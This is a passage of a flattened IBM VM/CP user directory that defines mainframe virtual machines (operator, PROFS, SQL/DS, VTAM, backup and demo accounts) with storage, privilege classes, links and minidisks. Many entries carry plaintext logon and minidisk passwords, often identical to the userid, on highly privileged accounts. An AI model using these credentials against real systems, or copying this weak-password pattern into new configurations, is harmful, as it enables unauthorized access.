3380 734 007 VMPK01 MR RMAINT WMAINT MMAINT 03131808 MDISK 326 3380 166 010 VMPK01 MR RMAINT WMAINT MMAINT 03131808 MDISK 34A 3380 164 052 VMSRES MR RMAINT WMAINT MMAINT 03131808 MDISK 346 3380 207 013 SQLPK MR RMAINT WMAINT MMAINT 03131808 MDISK 347 3380 220 023 SQLPK MR RMAINT WMAINT MMAINT 03131808 MDISK 360 3380 216 040 VMSRES MR RMAINT WMAINT MMAINT 03131808 MDISK 361 3380 768 027 VMSRES MR RMAINT WMAINT MMAINT 03131808 MDISK 363 3380 795 009 VMSRES MR RMAINT WMAINT MMAINT 03131808 * USER OPERATNS OPERATNS 1M 2M BCEG INCLUDE EXPPROF ACCOUNT 13 SYSPROG LINK MAINT 300 300 RR LINK MAINT 193 192 RR MDISK 191 3380 547 001 VMSRES MR RIPCS WIPCS MIPCS 03131808 MDISK 193 3380 256 008 VMSRES MR RIPCS WIPCS MIPCS 03131808 * USER OPERATOR OPERATOR 3M 16M ABCDEFG ACCOUNT 2 OPERATOR IPL CMS PARM AUTOCR CONSOLE 009 3215 T MAINT SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR LINK MAINT 300 300 RR MDISK 191 3380 545 002 VMSRES MR ROPER WOPER MOPER 03131808 * USER SYSDUMP1 SYSDUMP1 1M 1M BG INCLUDE EXPPROF ACCOUNT 16 SYSTEM LINK MAINT 300 300 RR MDISK 123 3380 000 885 VMSRES RR 03131808 MDISK 124 3380 000 885 VMPK01 RR 03131808 MDISK 126 3380 000 885 VMSTGE RR 03131808 MDISK 127 3380 000 885 VMGCS1 RR 03131808 MDISK 129 3380 000 885 PROFPK RR 03131808 MDISK 130 3380 000 885 SQLPK RR 03131808 MDISK 131 3380 000 885 VMPK02 RR 03131808 MDISK 191 3380 133 001 VMPK01 MR RSYSDUMP WSYSDUMP MSYSDUMP 03131808 * USER TSAFVM TSAFVM 4M 8M G ACCOUNT 1 XXXXXX OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER IUCV ALLOW IUCV *CRM IPL CMS PARM AUTOCR CONSOLE 009 3215 A OPERATOR SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR LINK MAINT 492 192 RR LINK MAINT 494 494 RR *DEDICATE 300 4A0 MDISK 191 3380 206 002 VMPK01 MR 03131808 * USER VSEMAINT VSEMAINT 1M 4M BG INCLUDE EXPPROF ACCOUNT 211 DOSSYS LINK MAINT 300 300 RR *LINK MAINT 301 301 RR MDISK 191 3380 632 004 VMSRES MR RVSEMAIN WVSEMAIN MVSEMAIN 03131808 * USER VSEIPO VSEIPO 16M 16M G * * SAMPLE USERID TO RUN VSE/EXPRESS/IPO * ACCOUNT 203 VSEIPO IPL 224 *OPTION ECMODE BMX REALTIMER VIRT=REAL MAXCONN 050 STF 370E OPTION ECMODE BMX REALTIMER MAXCONN 050 IUCV *CCS PRIORITY MSGLIMIT 050 CONSOLE 01F 3270 SPECIAL 401 3270 SPECIAL 402 3270 SPECIAL 403 3270 SPECIAL 404 3270 SPECIAL 405 3270 SPECIAL 406 3270 SPECIAL 407 3270 SPECIAL 408 3270 SPECIAL 409 3270 SPECIAL 40A 3270 SPECIAL 40B 3270 SPECIAL 40C 3270 SPECIAL 40D 3270 SPECIAL 40E 3270 SPECIAL 40F 3270 SPECIAL 410 3270 SPECIAL 411 3270 SPECIAL 412 3270 SPECIAL 413 3270 SPECIAL 414 3270 SPECIAL 415 3270 SPECIAL 416 3270 SPECIAL 417 3270 SPECIAL 418 3270 SPECIAL 419 3270 SPECIAL 41A 3270 SPECIAL 41B 3270 SPECIAL 41C 3270 SPECIAL 41D 3270 SPECIAL 41E 3270 SPECIAL 41F 3270 SPOOL 00C 3505 A SPOOL 00D 3525 A SPOOL 00E 3203 A SPOOL 05D 3525 A SPOOL 05E 1403 A DEDICATE 300 400 DEDICATE 080 080 LINK MAINT 190 190 RR LINK MAINT 19E 19E RR LINK VSEMAINT 191 191 RR * 3380 SYSTEM *MDISK 150 3380 000 885 DOSRES MR VSEIPO VSEIPO *MDISK 151 3380 000 885 SYSWK1 MR VSEIPO VSEIPO *MDISK 152 3380 000 885 SYSWK2 MR VSEIPO VSEIPO * 3375 SYSTEM *MDISK 140 3375 000 959 DOSRES MR VSEIPO VSEIPO *MDISK 141 3375 000 959 SYSWK1 MR VSEIPO VSEIPO *MDISK 142 3375 000 959 SYSWK2 MR VSEIPO VSEIPO * FB-512 SYSTEM *MDISK 240 FB-512 00000 558000 DOSRES MR VSEIPO VSEIPO *MDISK 241 FB-512 00000 558000 SYSWK1 MR VSEIPO VSEIPO *MDISK 242 FB-512 00000 558000 SYSWK2 MR VSEIPO VSEIPO * 3350 SYSTEM MDISK 220 3350 000 555 SYSWKB MR VSE220 VSE0WO MDISK 222 3350 000 555 SYSWK2 MR VSE222 VSE2WO MDISK 223 3350 000 555 SYSWK4 MR VSE223 VSE3WO MDISK 224 3350 000 555 DOSRES MR VSE224 VSE4WO MDISK 225 3350 000 555 SYSWK1 MR VSE225 VSE5WO * 3380 SYSTEM MDISK 200 3380 000 885 SYSWKA MR VSE219 VSEAWO * USER ROUTER ROUTER 512K 2M G 64 ON ON ON ON INCLUDE EXPPROF ACCOUNT 46 ROUTER MDISK 191 3380 636 003 VMSRES MR RROUTER WROUTER MROUTER 03131808 * USER AP2SVP AP2SVP 512K 8M EG 64 ON ON ON ON * * 5668899 APL2 SERVICE MACHINE * INCLUDE EXPPROF ACCOUNT 9999 APL2-SVP MDISK 191 3380 731 003 VMPK01 MR RAP2SVP WAP2SVP MAP2SVP 03131808 * USER APL2PP APL2PP 3M 16M BEG 64 ON ON ON ON * * 5668899 APL2 * INCLUDE EXPPROF ACCOUNT 9999 I5668899 MDISK 191 3380 264 044 VMSRES MR ALL WAPL2PP 03131808 * USER VMASSYS VMASSYS 16M 16M EG 64 ON ON ON ON * * 5767032 AS * INCLUDE EXPPROF ACCOUNT 15 SYSTEM LINK ISPVM 192 192 RR LINK SQLDBA 195 195 RR MDISK 191 3380 569 018 VMPK01 MR RVMASSYS WVMASSYS INSTALL 03131808 MDISK 391 3380 587 095 VMPK01 MR RVMASSYS WVMASSYS SYSTEM 03131808 MDISK 392 3380 682 005 VMPK01 MR RVMASSYS WVMASSYS TEST 03131808 MDISK 393 3380 687 026 VMPK01 MR RVMASSYS WVMASSYS IPCS 03131808 * USER VMASMON VMASMON 2M 2M G 64 ON ON ON ON * * 5767032 AS * INCLUDE EXPPROF ACCOUNT 15 SYSTEM OPTION MAXCONN 20 IUCV ALLOW LINK VMASSYS 191 390 RR LINK VMASSYS 391 391 RR MDISK 191 3380 567 002 VMPK01 MR RVMASMON WVMASMON MVMASMON 03131808 * USER VMASTEST VMASTEST 2M 2M G 64 ON ON ON ON * * 5767032 AS * INCLUDE EXPPROF ACCOUNT 15 SYSTEM LINK VMASSYS 391 391 RR LINK VMASSYS 392 392 RR MDISK 191 3380 713 018 VMPK01 MR RVMASTES WVMASTES MVMASTES 03131808 * USER BATCH BATCH 2M 2M ABEG 64 ON ON ON ON * * 5664364 VM BATCH FACILITY * INCLUDE EXPPROF ACCOUNT 999 IUCV ALLOW OPTION BMX MAXCONN 256 MDISK 191 3380 741 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808 MDISK 193 3380 744 020 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808 MDISK 194 3380 764 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808 MDISK 199 3380 767 002 VMPK01 RR RVMBATCH WVMBATCH MVMBATCH 03131808 MDISK 195 3380 769 002 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808 * USER BATCH1 BATCH1 2M 4M G 64 ON ON ON ON * * 5664364 VM BATCH FACILITY TEST USERID * INCLUDE EXPPROF ACCOUNT 999 MDISK 191 3380 771 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808 * USER BATCH2 BATCH2 2M 4M G 64 ON ON ON ON * * 5664364 VM BATCH FACILITY TEST USERID * INCLUDE EXPPROF ACCOUNT 999 MDISK 191 3380 776 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808 * * USER CSPUSER CSPUSER 2M 4M G 64 ON ON ON ON * * 5668814 CSP * * INCLUDE EXPPROF * ACCOUNT 101 * MDISK 191 3380 134 032 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808 * MDISK 193 3380 519 008 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808 * MDISK 502 3380 527 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808 * MDISK 503 3380 547 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808 * USER CVIEW CVIEW 2M 2M G 64 ON ON ON ON * * 5664296 CVIEW * INCLUDE EXPPROF ACCOUNT 15 SYSTEM OPTION BMX LINK MAINT 193 193 RR MDISK 191 3380 732 004 VMSRES MR RCVIEW WCVIEW 03131808 * USER DIRMAINT DIRMAINT 1M 2M BG 64 ON ON ON ON * * 5748XE4 DIRMAINT * INCLUDE EXPPROF ACCOUNT 7 SYSADMIN OPTION REALTIME ECMODE MDISK 191 3380 191 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808 MDISK 193 3380 001 009 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808 MDISK 195 3380 049 009 VMSRES MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808 MDISK 294 3380 844 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808 MDISK 394 3380 226 019 VMSTGE MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808 MDISK 123 3380 000 885 VMSRES MW 03131808 * USER DATAMOVE DATAMOVE 1M 1M G 64 ON ON ON ON * * 5748XE4 DATAMOVE MACHINE * INCLUDE EXPPROF ACCOUNT 5 SYSADMIN OPTION ACCT ECMODE LINK DIRMAINT 191 193 RR LINK MAINT 193 192 RR MDISK 191 3380 178 003 VMPK01 MR RDATAMOV WDATAMOV MDATAMOV 03131808 * USER FSFCNTRL FSFCNTRL 2M 16M ABG 64 ON ON ON ON * * 5798DMY FILE STORAGE CONTROL MACHINE * INCLUDE EXPPROF ACCOUNT 999 OPTION ECMODE BMX MAXCONN 256 IUCV ALLOW PRIORITY MSGLIMIT 255 LINK FSFADMIN 192 198 RR MDISK 191 3380 143 007 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 192 3380 141 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 193 3380 150 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 194 3380 152 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 195 3380 153 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 197 3380 154 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 200 3380 155 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 201 3380 160 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 400 3380 165 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 MDISK 401 3380 170 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808 * USER FSFTASK1 FSFTASK1 1M 1M G 64 ON ON ON ON * * 5798DMY FILE STORAGE TASK MACHINE * INCLUDE EXPPROF ACCOUNT 999 OPTION BMX MAXCONN 2 IUCV ALLOW PRIORITY MSGLIMIT 255 LINK FSFCNTRL 191 191 RR * USER FSFTASK2 FSFTASK2 1M 1M G 64 ON ON ON ON * * 5798DMY FILE STORAGE TASK MACHINE * INCLUDE EXPPROF ACCOUNT 999 OPTION BMX MAXCONN 2 IUCV ALLOW PRIORITY MSGLIMIT 255 LINK FSFCNTRL 191 191 RR * USER FSFADMIN FSFADMIN 1M 1M G 64 ON ON ON ON * * 5798DMY FILE STORAGE ADMINISTRATOR * INCLUDE EXPPROF ACCOUNT 999 OPTION BMX MAXCONN 2 IUCV ALLOW PRIORITY MSGLIMIT 255 LINK MAINT 319 319 RR MDISK 192 3380 175 003 VMPK02 MR RFSFADMI WFSFADMI MFSFADMI 03131808 * USER IIPS IIPS 2M 4M G 64 ON ON ON ON * * 5668012 IIPS * INCLUDE EXPPROF ACCOUNT 8 INSTR MDISK 191 3380 736 013 VMSRES MR RIIPS WIIPS MIIPS 03131808 MDISK 193 3380 749 019 VMSRES MR RIIPS WIIPS MIIPS 03131808 * USER ADMIN ADMIN 1664K 16M ABCDEFG 64 ON ON ON ON * * 5664318 VM/IPF * INCLUDE EXPPROF LINK MAINT 300 300 RR MDISK 191 3380 781 001 VMPK01 MR RADMIN WADMIN MADMIN 03131808 * USER DISKACNT DISKACNT 512K 2M G 64 ON ON ON ON * * 5664318 VM/IPF * INCLUDE EXPPROF OPTION ECMODE LINK MAINT 300 300 RR MDISK 191 3380 010 002 VMPK01 MR RDISKACN WDISKACN MDISKACN 03131808 * USER CPRM CPRM 512K 1M G 64 ON ON ON ON * * 5664318 VM/IPF * INCLUDE EXPPROF LINK OPERATNS 193 193 RR MDISK 191 3380 783 001 VMPK01 MR RCPRM WCPRM MCPRM 03131808 MDISK 192 3380 098 007 VMSRES MR ALL WCPRM MCPRM 03131808 MDISK 291 3380 784 001 VMPK01 MR RCPRM WCPRM MCPRM 03131808 * USER OP1 OP1 1M 13M ABCDEFG 64 ON ON ON ON * * 5664318 VM/IPF * INCLUDE EXPPROF LINK MAINT 300 300 RR MDISK 191 3380 058 001 VMSRES MR ROP1 WOP1 MOP1 03131808 * USER VMUTIL VMUTIL 512K 2M ABDEG 64 ON ON ON ON * * 5664318 VM/IPF * INCLUDE EXPPROF IPL CMS OPTION ECMODE LINK MAINT 300 300 RR MDISK 191 3380 059 001 VMSRES MR RVMUTIL WVMUTIL MVMUTIL 03131808 * USER IPFSERV IPFSERV 2M 16M G 64 ON ON ON ON * * 5664318 VM/IPF * IPL CMS CONSOLE 009 3215 T MAINT SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 123 123 MW LINK MAINT 190 190 RR LINK MAINT 191 192 RR LINK MAINT 193 193 RR LINK MAINT 194 194 RR LINK MAINT 19D 19D RR LINK MAINT 19E 19E RR LINK MAINT 294 294 RR LINK MAINT 295 295 RR LINK MAINT 300 300 RR MDISK 191 3380 060 001 VMSRES MR RIPFSERV WIPFSERV MIPFSERV 03131808 * USER ISPVM ISPVM 1M 10M EG 64 ON ON ON ON * * 5664282 ISPF * INCLUDE EXPPROF ACCOUNT 104 USER04 MDISK 191 3380 548 005 VMSRES MR RISPVM WISPVM MISPVM 03131808 MDISK 192 3380 110 054 VMSRES MR RISPVM WISPVM MISPVM 03131808 * USER NETVIEW NETVIEW 5M 16M G 64 ON ON ON ON * * 5664175 NETVIEW * ACCOUNT NETVIEW GCS OPTION ECMODE IUCV ANY P M 0 IUCV *LOGREC IPL GCS PARM AUTOLOG CONSOLE 01F 3215 SPOOL 00C 2540 READER A SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 334 191 RR LINK VTAM 191 291 RR LINK VTAM 29A 29A RR LINK MAINT 595 595 RR MDISK 198 3380 166 034 VMGCS1 WR RNETVIEW WNETVIEW MNETVIEW 03131808 * USER PRODBM PRODBM 1M 4M G 64 ON ON ON ON * * 5664309 PROFS DATABASE MANAGER * INCLUDE EXPPROF ACCOUNT 250 PRODBM OPTION MAXCONN 2000 IUCV ALLOW LINK SYSADMIN 399 399 RR MDISK 161 3380 169 011 PROFPK MR RDBM WDBM MDBM 03131808 MDISK 191 3380 165 004 PROFPK MR RDBM WDBM MDBM 03131808 MDISK 5FD 3380 206 013 PROFPK MR RDBM WDBM MDBM 03131808 MDISK 5FE 3380 193 013 PROFPK MR RDBM WDBM MDBM 03131808 MDISK 5FF 3380 180 013 PROFPK MR RDBM WDBM MDBM 03131808 * USER PROMAIL PROMAIL 1M 2M G 64 ON ON ON ON * * 5664309 PROFS DISTRIBUTION MANAGER * INCLUDE EXPPROF ACCOUNT 250 PROMAIL LINK PRODBM 191 395 RR LINK SYSADMIN 399 399 RR MDISK 151 3380 092 004 PROFPK MR RMAIL WMAIL MMAIL 03131808 MDISK 191 3380 084 008 PROFPK MR RMAIL WMAIL MMAIL 03131808 * USER PROCAL PROCAL 1M 4M G 64 ON ON ON ON * * 5664309 PROFS CALENDAR MANAGER * INCLUDE EXPPROF ACCOUNT 250 PROCAL LINK PRODBM 191 395 RR LINK SYSADMIN 398 398 RR LINK SYSADMIN 399 399 RR MDISK 191 3380 096 004 PROFPK MR RCAL WCAL MCAL 03131808 MDISK 5FB 3380 100 013 PROFPK MR RCAL WCAL MCAL 03131808 MDISK 5FC 3380 113 013 PROFPK MR RCAL WCAL MCAL 03131808 MDISK 5FD 3380 126 013 PROFPK MR RCAL WCAL MCAL 03131808 MDISK 5FE 3380 139 013 PROFPK MR RCAL WCAL MCAL 03131808 MDISK 5FF 3380 152 013 PROFPK MR RCAL WCAL MCAL 03131808 * USER SYSADMIN NOLOG 1M 16M EG 64 ON ON ON ON * * 5664309 PROFS ADMINISTRATOR * INCLUDE EXPPROF ACCOUNT 250 SYSADMIN LINK PRODBM 161 161 RR LINK PRODBM 191 4FA RR LINK PRODBM 5FD 5FD RR LINK PRODBM 5FE 5FE RR LINK PRODBM 5FF 5FF RR MDISK 191 3380 001 011 PROFPK MR RADMIN WADMIN MADMIN 03131808 MDISK 298 3380 012 029 PROFPK MR RADMIN WADMIN MADMIN 03131808 MDISK 398 3380 041 019 PROFPK MR RADMIN WADMIN MADMIN 03131808 MDISK 399 3380 060 024 PROFPK MR RADMIN WADMIN MADMIN 03131808 MDISK 397 3380 219 002 PROFPK MR ALL WADMIN MADMIN 03131808 * USER SFCM1 SFCM1 3M 5M BDG 64 ON ON ON ON * * 5664198 PSF * INCLUDE EXPPROF ACCOUNT 100 PSF OPTION ACCT IUCV *SPL LINK PDM470 191 193 RR LINK PDMREM1 191 194 RR LINK PSFMAINT 191 291 RR LINK PSFMAINT 193 293 RR LINK PSFMAINT 194 294 RR MDISK 191 3380 839 020 VMSRES MR RSFCM1 WSFCM1 03131808 * USER PSFMAINT PSFMAINT 3M 16M ABCDEFG 64 ON ON ON ON * * 5664198 PSF MAINTENANCE * INCLUDE EXPPROF ACCOUNT 1 SYSPROG MDISK 191 3380 814 011 VMSRES MR RPSFMAIN WPSFMAIN 03131808 MDISK 193 3380 825 004 VMSRES MR RPSFMAIN WPSFMAIN 03131808 MDISK 194 3380 829 010 VMSRES MR RPSFMAIN WPSFMAIN 03131808 * USER PDM470 PDM470 4M 5M BG 64 ON ON ON ON * * 5664198 PSF 3800 PDM * INCLUDE EXPPROF ACCOUNT 100 PSF OPTION ACCT IUCV *SPL *DEDICATE 470 470 LINK SFCM1 191 193 RR LINK PSFMAINT 191 291 RR LINK PSFMAINT 194 294 RR MDISK 191 3380 809 005 VMSRES MR RPDM470 WPDM470 03131808 * USER PDMREM1 PDMREM1 4M 5M BG 64 ON ON ON ON * * 5664198 PSF 3820 PDM * ACCOUNT 100 PSF OPTION ACCT ECMODE IPL GCS PARM AUTOLOG IUCV *SPL CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 19E 19E RR LINK MAINT 595 595 RR LINK SFCM1 191 193 RR LINK PSFMAINT 191 291 RR LINK PSFMAINT 194 294 RR MDISK 191 3380 804 005 VMSRES MR RPDMREM1 WPDMREM1 03131808 * USER PVM PVM 1024K 2M BG 50 ON ON ON ON * * 5748RC1 VM PASS-THROUGH FACILITY * INCLUDE EXPPROF OPTION ECMODE LINK MAINT 193 193 RR LINK MAINT 36E 191 MR * USER RSCS RSCS 1M 2M BG 64 ON ON ON ON * * 5748XP1 RSCS V1 * ACCOUNT 15 SYSTEM OPTION ACCT ECMODE IPL 191 CONSOLE 009 3215 SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 193 193 RR LINK MAINT 19E 19E RR LINK MAINT 19D 19D RR LINK MAINT 49E 49E RR MDISK 191 3380 105 002 VMSRES MR RRSCS WRSCS MRSCS 03131808 * USER RSCSV2 RSCSV2 2M 4M BG 64 ON ON ON ON * * 5664188 RSCS (VERSION 2) * ACCOUNT 15 SYSTEM OPTION ECMODE ACCT BMX VCUNOSHR IPL GCS PARM AUTOLOG CONSOLE 01F 3215 T OPERATOR SPOOL 00C 2540 READER A SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 595 595 RR LINK MAINT 59F 191 RR * USER SMART SMART 2048K 2M CEG 64 ON ON ON ON * * 5796PNA VM REAL TIME MONITOR SYSTEM * INCLUDE EXPPROF ACCOUNT 999 LINK MAINT 319 319 RR MDISK 191 3380 848 026 VMPK01 MR RSMART WSMART MSMART 03131808 * USER SQLDBA SQLDBA 6M 6M G 64 ON OFF OFF \ * * 5748XXJ SQL/DS ADMINISTRATOR * ACCOUNT 26 OPTION MAXCONN 25 IUCV ALLOW IUCV *IDENT SQLDBA GLOBAL IPL CMS CONSOLE 009 3215 T OPERATOR SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 LINK MAINT 190 190 RR LINK MAINT 19D 19D RR MDISK 191 3380 001 010 SQLPK W 03131808 MDISK 193 3380 011 035 SQLPK R RSQL WSQL 03131808 MDISK 195 3380 046 013 SQLPK RR RSQL WSQL MSQL 03131808 MDISK 200 3380 059 034 SQLPK R RSQL WSQL 03131808 MDISK 201 3380 093 011 SQLPK R RSQL WSQL 03131808 MDISK 202 3380 104 100 SQLPK R RSQL WSQL 03131808 * USER SQLUSER SQLUSER 2M 2M G 64 ON ON ON ON * * 5748XXJ SQL/DS USER MACHINE * INCLUDE EXPPROF ACCOUNT 27 OPTION REALTIMER IUCV SQLDBA LINK SQLDBA 195 195 RR MDISK 191 3380 204 003 SQLPK W 03131808 * USER VMARCH VMARCH 2M 4M BEG 64 ON ON ON ON * * 5664291 VMBACKUP * INCLUDE EXPPROF ACCOUNT 999 OPTION ACCT ECMODE LINK MAINT 123 1A0 RR MDISK 191 3380 001 011 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808 MDISK 193 3380 012 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808 MDISK 100 3380 019 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808 MDISK 101 3380 026 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808 MDISK 200 3380 033 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808 * USER VMBACKUP VMBACKUP 2M 16M BEG 64 ON ON ON ON * * 5664291 VMBACKUP * ACCOUNT 999 OPTION ACCT BMX ECMODE IPL CMS CONSOLE 009 3215 SPOOL 001 2540 READER * SPOOL 00C 2540 READER * SPOOL 00D 2540 PUNCH SPOOL 0D0 2540 PUNCH SPOOL 0D1 2540 PUNCH SPOOL 00E 1403 SPOOL 0E0 1403 SPOOL 0E1 1403 SPOOL 0E2 1403 SPOOL 0E3 1403 SPOOL 0E4 1403 SPOOL 0E5 1403 SPOOL 0E6 1403 SPOOL 0E7 1403 LINK MAINT 190 190 RR LINK MAINT 19E 19E RR LINK MAINT 123 1A0 RR MDISK 191 3380 040 006 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808 MDISK 192 3380 046 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808 MDISK 193 3380 049 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808 MDISK 194 3380 052 044 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808 * USER VMBSYSAD VMBSYSAD 1M 4M BG 64 ON ON ON ON * * 5664291 VMBACKUP * INCLUDE EXPPROF ACCOUNT 999 LINK MAINT 191 124 RR LINK VMBACKUP 194 294 RR RVMBACKU LINK VMBACKUP 193 293 RR RVMBACKU LINK MAINT 123 1A0 RR MDISK 191 3380 096 005 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA 03131808 MDISK 192 3380 101 009 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA 03131808 * USER DEMO1 DEMO1 4M 4M G 64 ON ON ON ON * * 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER * INCLUDE EXPPROF ACCOUNT DEMO1 DEMO1 IUCV SQLDBA LINK MAINT 319 319 RR LINK MAINT 31A 31A RR LINK MAINT 322 322 RR LINK MAINT 326 326 RR LINK MAINT 34A 59A RR LINK SQLDBA 195 195 RR LINK SYSADMIN 399 399 RR MDISK 191 3380 107 003 VMSRES MR RDEMO1 WDEMO1 MDEMO1 03131808 * USER DEMO2 DEMO2 4M 4M G 64 ON ON ON ON * * 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER * INCLUDE EXPPROF ACCOUNT DEMO2 DEMO2 IUCV SQLDBA LINK MAINT 319 319 RR LINK MAINT 31A 31A RR LINK MAINT 322 322 RR LINK MAINT 326 326 RR LINK MAINT 34A 59A RR LINK SQLDBA 195 195 RR LINK SYSADMIN 399 399 RR MDISK 191 3380 859 003 VMSRES MR RDEMO2 WDEMO2 MDEMO2 03131808 * USER DEMO3 DEMO3 4M 4M G 64 ON ON ON ON * * 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER * INCLUDE EXPPROF ACCOUNT DEMO3 DEMO3 IUCV SQLDBA LINK MAINT 319 319 RR LINK MAINT 31A 31A RR LINK MAINT 322 322 RR LINK MAINT 326 326 RR LINK MAINT 34A 59A RR LINK SQLDBA 195 195 RR LINK SYSADMIN 399 399 RR MDISK 191 3380 862 003 VMSRES MR RDEMO3 WDEMO3 MDEMO3 03131808 * USER DEMO4 DEMO4 4M 4M G 64 ON ON ON ON * * 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER * INCLUDE EXPPROF ACCOUNT DEMO4 DEMO4 IUCV SQLDBA LINK MAINT 319 319 RR LINK MAINT 31A 31A RR LINK MAINT 322 322 RR LINK MAINT 326 326 RR LINK MAINT 34A 59A RR LINK SQLDBA 195 195 RR LINK SYSADMIN 399 399 RR MDISK 191 3380 865 003 VMSRES MR RDEMO4 WDEMO4 MDEMO4 03131808 * USER VMTAPE VMTAPE 1M 2M BCEG 64 ON ON ON ON * * 5664292 VMTAPE * INCLUDE EXPPROF ACCOUNT 999 OPTION BMX ECMODE ACCT MDISK 191 3380 110 005 VMPK02 MR RVMTAPE WVMTAPE MVMTAPE 03131808 MDISK 200 3380 115 007 VMPK02 MR RVMTAPE WVMTAPE MVMTAPE 03131808 MDISK 300 3380 122 007 VMPK02 MR RVMTAPE WVMTAPE MVMTAPE 03131808 * USER VMTLIBR VMTLIBR 1M 3M G 64 ON ON ON ON * * 5664292 VMTAPE * INCLUDE EXPPROF ACCOUNT 999 LINK VMTAPE 191 193 MR LINK VMTAPE 200 200 MW LINK VMTAPE 300 300 MW MDISK 191 3380 129 005 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR 03131808 MDISK 192 3380 134 007 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR 03131808 * USER VMMAP VMMAP 2M 4M G 64 ON ON ON ON * * 5664191 VMMAP * INCLUDE EXPPROF ACCOUNT 999 LINK MAINT 193 193 RR MDISK 191 3380 639 024 VMSRES MR RVMMAP WVMMAP MVMMAP 03131808 * USER VTAM VTAM 5M 16M G 64 ON ON ON ON * * 5664280 VTAM * ACCOUNT VTAM GCS OPTION ECMODE DIAG98 MAXCONN 400 IUCV *CCS P M 10 IUCV ANY P M 0 IPL GCS PARM AUTOLOG CONSOLE 01F 3215 SPOOL 00C 2540 READER A SPOOL 00D 2540 PUNCH A SPOOL 00E 1403 A LINK MAINT 190 190 RR LINK MAINT 298 191 RR LINK MAINT 29A 29A RR LINK MAINT 595 595 RR * USER VM3812 VM3812 3M 4M BG 64 ON ON ON ON * * 5798DTE VM3812 SERVICE MACHINE * INCLUDE EXPPROF ACCOUNT 15 SYSTEM MDISK 191 3380 813 004 VMPK01 MR RVM3812 WVM3812 MVM3812 03131808 MDISK 192 3380 817 007 VMPK01 MR RVM3812 WVM3812 MVM3812 03131808 MDISK 193 3380 824 020 VMPK01 MR ALL WVM3812 03131808 * ADD USER ID ------ USER VSEMAN VSE 2M 16M ABCDEFG 42 ON ON ON ON INCLUDE EXPPROF ACCOUNT 999 SYSTEM MDISK 191 3380 001 030 EDMD01 MR VSE 03131808 MDISK 192 3380 873 012 VMSRES MR VSE 03131808 USER PENG PENG 2M 16M ABCDEFG 42 ON ON ON ON INCLUDE EXPPROF ACCOUNT 999 SYSTEM MDISK 191 3380 553 010 VMSRES MR PENG PENG 03131808 * USER MOESERV MOESERV 2M 16M G 42 ON ON ON ON INCLUDE EXPPROF ACCOUNT 996 MOE MDISK 191 3380 544 002 VMPK01 MR MOESERV MOESERV 03131808 * USER VTAMUSER CCC 2M 8M G 64 ON ON ON ON * * 5668814 CSP * INCLUDE EXPPROF ACCOUNT 101 MDISK 191 3380 134 032 VMPK01 MW VTAM1 WVTAM1 MVTAM1 03131808 USER IDMSSE IDMS 2M 8M G 64 ON ON ON ON INCLUDE EXPPROF ACCOUNT 101 MDISK 191 3380 519 